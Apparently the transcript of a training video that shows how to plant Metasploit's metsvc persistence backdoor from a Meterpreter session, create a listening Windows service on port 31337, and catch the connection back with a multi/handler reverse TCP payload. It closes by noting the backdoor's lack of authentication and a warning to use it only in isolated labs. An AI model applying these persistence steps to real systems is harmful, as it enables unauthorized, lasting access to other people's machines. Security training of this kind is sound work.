Welcome. In this video, we are going to learn metsvc exploitation in Meterpreter. Metasploit offers the ability to place a backdoor on the remote system in order to maintain access after your exploitation. In this video, we will see how we can work with metsvc backdoor and what are the limitations of it. Let's say that we have already compromised the target by using Meterpreter service payload. Let's open up terminal. Here I already opened session. Type sessions. Let's use session 2. Type sessions-i2. Metasploit offers the ability to place a backdoor on the remote system in order to maintain access after your exploitation. We will see how we can work with metsvc backdoor and what are the limitations of it. Let's say that we have already compromised the target by using a Meterpreter service payload. We can have a look at the available options of the metsvc backdoor by executing the command type run metsvc. This command will upload some files and it will create a Windows service on the remote machine which will run on the port 31337. If you want to remove the backdoor from the target machine, you can use the command run metsvc-r in order to achieve that. Exit from Meterpreter. Type use exploit/multi/handler. Set payload as Windows Meterpreter reverse TCP. Set rhost and lhost. Our target system will send the Meterpreter sessions. The metsvc backdoor runs as a service on the remote system and requires no authentication, so anyone that will find the backdoor can connect through it to our target. Also, it can be discovered easily by using a simple port scanner, so it is risky to use. From the other hand, it is less noisy compared to the persistence backdoor. Don't try this backdoor in real system. If you want to use it in order to expand your knowledge about backdoor, then use it on a safe and isolated environment. So that's it in this video on metsvc exploitation in Meterpreter. Thank you for watching this video.